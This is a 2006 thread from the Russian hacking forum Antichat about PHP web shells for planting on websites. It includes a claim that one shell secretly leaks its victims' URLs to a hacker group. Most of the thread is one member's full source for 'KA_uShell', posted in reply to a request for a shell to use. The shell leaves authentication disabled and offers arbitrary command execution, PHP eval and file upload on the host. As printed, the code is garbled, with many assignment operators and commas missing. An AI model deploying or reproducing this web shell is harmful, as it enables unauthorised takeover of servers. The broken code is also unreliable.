ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 22.02.2006, 20:58
Аватар для w4rd3n
w4rd3n
Banned
Регистрация: 06.10.2005
Сообщений: 180
Провел на форуме:
244618

Репутация: -4
По умолчанию

Регистрировать нечего не надо...
Все работает...
Народ Хочу вас обламать все данные а точнее url вашего шелла поступают в группу rst если внимательно почитать код то можно найти где это заявление прозвучало от самой группы несколько месяцев назад..,!
 
Ответить с цитированием

  #12  
Старый 22.02.2006, 21:41
Аватар для k1b0rg
k1b0rg
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553

Репутация: 1316


По умолчанию

да, я когда ихний шелл модифицировал видел ихние счетчики, скрыты в base64
$cm1 и $cm2 выводит их в самом конце переменная $f
присутсвует проверка, если счетчики удалены, то шелл не загрузиться
 
Ответить с цитированием

  #13  
Старый 23.02.2006, 15:02
Аватар для Otaku
Otaku
Познавший АНТИЧАТ
Регистрация: 24.07.2005
Сообщений: 1,057
Провел на форуме:
1864132

Репутация: 116


По умолчанию

Видал где то вроде избавленную от этого версию.
 
Ответить с цитированием

  #14  
Старый 23.02.2006, 21:34
Аватар для F_taker
F_taker
Новичок
Регистрация: 18.01.2006
Сообщений: 23
Провел на форуме:
49223

Репутация: 1
По умолчанию

А у меня шелл на сайт грузится (сам через фтп грузил), но никакие комманды не работают.
Может какой-нибудт другой шелл поюзать? только вот я не знаю какой
 
Ответить с цитированием

  #15  
Старый 23.02.2006, 21:57
Аватар для Azazel
Azazel
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
Провел на форуме:
5957900

Репутация: 561


По умолчанию

Цитата:
Сообщение от F_taker  
А у меня шелл на сайт грузится (сам через фтп грузил), но никакие комманды не работают.
Может какой-нибудт другой шелл поюзать? только вот я не знаю какой
Удобно, просто, легко. А главное - сухо!
PHP код:
<!--

/+--------------------------------+\
 |            KA_uShell           |
 |    <KAdot Universal Shell>     |
 |         Version 0.1.6          |
 |            13.03.04            |
 |  Author: KAdot <KAdot@ngs.ru>  |
 |--------------------------------|
\+                                +/

-->
<html>
<head>
<title>KA_uShell 0.1.6</title>
<style type="text/css">
<!--
body, table{font-family:Verdana; font-size:12px;}
table {background-color:#EAEAEA; border-width:0px;}
b {font-family:Arial; font-size:15px;}
a{text-decoration:none;}
-->
</style>
</head>
<body>

<?php
$self 
$_SERVER['PHP_SELF'];
$docr $_SERVER['DOCUMENT_ROOT'];
$sern $_SERVER['SERVER_NAME'];
$tend "</tr></form></table><br><br><br><br>";

// Configuration
$login "admin";
$pass "123";


/*/ Authentication
if (!isset($_SERVER['PHP_AUTH_USER'])) {
header('WWW-Authenticate: Basic realm="KA_uShell"');
header('HTTP/1.0 401 Unauthorized');
exit;}

else {
if(empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_PW']<>$pass || empty($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']<>$login)
{ echo "Что надо?"; exit;}
}
*/



if (!empty($_GET['ac'])) {$ac $_GET['ac'];}
elseif (!empty(
$_POST['ac'])) {$ac $_POST['ac'];}
else {
$ac "shell";}

// Menu
echo "
|<a href=
$self?ac=shell>Shell</a>|
|<a href=
$self?ac=upload>File Upload</a>|
|<a href=
$self?ac=tools>Tools</a>|
|<a href=
$self?ac=eval>PHP Eval Code</a>|
|<a href=
$self?ac=whois>Whois</a>|
<br><br><br><pre>"
;


switch(
$ac) {

// Shell
case "shell":

echo <<<HTML
<b>Shell</b>
<table>
<form action="
$self" method="POST">
<input type="hidden" name="ac" value="shell">
<tr><td>
$
$sern <input size="50" type="text" name="c"><input align="right" type="submit" value="Enter">
</td></tr>
<tr><td>
<textarea cols="100" rows="25">
HTML;

if (!empty(
$_POST['c'])){
passthru($_POST['c']);
}
echo 
"</textarea></td>$tend";
break;


//PHP Eval Code execution
case "eval":

echo <<<HTML
<b>PHP Eval Code</b>
<table>
<form method="POST" action="
$self">
<input type="hidden" name="ac" value="eval">
<tr>
<td><textarea name="ephp" rows="10" cols="60"></textarea></td>
</tr>
<tr>
<td><input type="submit" value="Enter"></td>
$tend
HTML;

if (isset(
$_POST['ephp'])){
eval(
$_POST['ephp']);
}
break;


//Text tools
case "tools":

echo <<<HTML
<b>Tools</b>
<table>
<form method="POST" action="
$self">
<input type="hidden" name="ac" value="tools">
<tr>
<td>
<input type="radio" name="tac" value="1">B64 Decode<br>
<input type="radio" name="tac" value="2">B64 Encode<br><hr>
<input type="radio" name="tac" value="3">md5 Hash
</td>
<td><textarea name="tot" rows="5" cols="42"></textarea></td>
</tr>
<tr>
<td> </td>
<td><input type="submit" value="Enter"></td>
$tend
HTML;

if (!empty(
$_POST['tot']) && !empty($_POST['tac'])) {

switch(
$_POST['tac']) {

case 
"1":
echo 
"Раскодированный текст:<b>" .base64_decode($_POST['tot']). "</b>";
break;

case 
"2":
echo 
"Кодированный текст:<b>" .base64_encode($_POST['tot']). "</b>";
break;

case 
"3":
echo 
"Кодированный текст:<b>" .md5($_POST['tot']). "</b>";
break;
}}
break;


// Uploading
case "upload":

echo <<<HTML
<b>File Upload</b>
<table>
<form enctype="multipart/form-data" action="
$self" method="POST">
<input type="hidden" name="ac" value="upload">
<tr>
<td>Файло:</td>
<td><input size="48" name="file" type="file"></td>
</tr>
<tr>
<td>Папка:</td>
<td><input size="48" value="
$docr/" name="path" type="text"><input type="submit" value="Послать"></td>
$tend
HTML;

if (isset(
$_POST['path'])){

$uploadfile $_POST['path'].$_FILES['file']['name'];
if (
$_POST['path']==""){$uploadfile $_FILES['file']['name'];}

if (
copy($_FILES['file']['tmp_name'], $uploadfile)) {
    echo 
"Файло успешно загружен в папку $uploadfile\n";
    echo 
"Имя:" .$_FILES['file']['name']. "\n";
    echo 
"Размер:" .$_FILES['file']['size']. "\n";

} else {
    print 
"Не удаётся загрузить файло. Инфа:\n";
    
print_r($_FILES);
}
}
break;


// Whois
case "whois":
echo <<<HTML
<b>Whois</b>
<table>
<form action="
$self" method="POST">
<input type="hidden" name="ac" value="whois">
<tr>
<td>Домен:</td>
<td><input size="40" type="text" name="wq"></td>
</tr>
<tr>
<td>Хуйз сервер:</td>
<td><input size="40" type="text" name="wser" value="whois.ripe.net"></td>
</tr>
<tr><td>
<input align="right" type="submit" value="Enter">
</td></tr>
$tend
HTML;

if (isset(
$_POST['wq']) && $_POST['wq']<>"") {

if (empty(
$_POST['wser'])) {$wser "whois.ripe.net";} else $wser $_POST['wser'];

$querty $_POST['wq']."\r\n";
$fp fsockopen($wser43);

if (!
$fp) {echo "Не могу открыть сокет";} else {
fputs($fp$querty);
while(!
feof($fp)){echo fgets($fp4000);}
fclose($fp);
}}
break;


}
?>
</pre>
</body>
</html>
__________________
Full DNS report
 
Ответить с цитированием

  #16  
Старый 23.02.2006, 23:26
Аватар для ShAnKaR
ShAnKaR
Пачка маргарина
Регистрация: 14.07.2005
Сообщений: 964
Провел на форуме:
4646474

Репутация: 1424


Отправить сообщение для ShAnKaR с помощью ICQ
По умолчанию

на правах рекламы
 
Ответить с цитированием

  #17  
Старый 23.02.2006, 23:30
Аватар для F_taker
F_taker
Новичок
Регистрация: 18.01.2006
Сообщений: 23
Провел на форуме:
49223

Репутация: 1
По умолчанию

Сервак пишет, что ошибка в 70 и 44 строках
После echo <<<HTML точка сзапятоц стоять должна?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Как залить shell через админку Vbulletin 3.5.2? user2006 Форумы 8 06.02.2006 21:24
dai te shell orkypower Комментарии к видео 1 08.01.2005 16:22



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ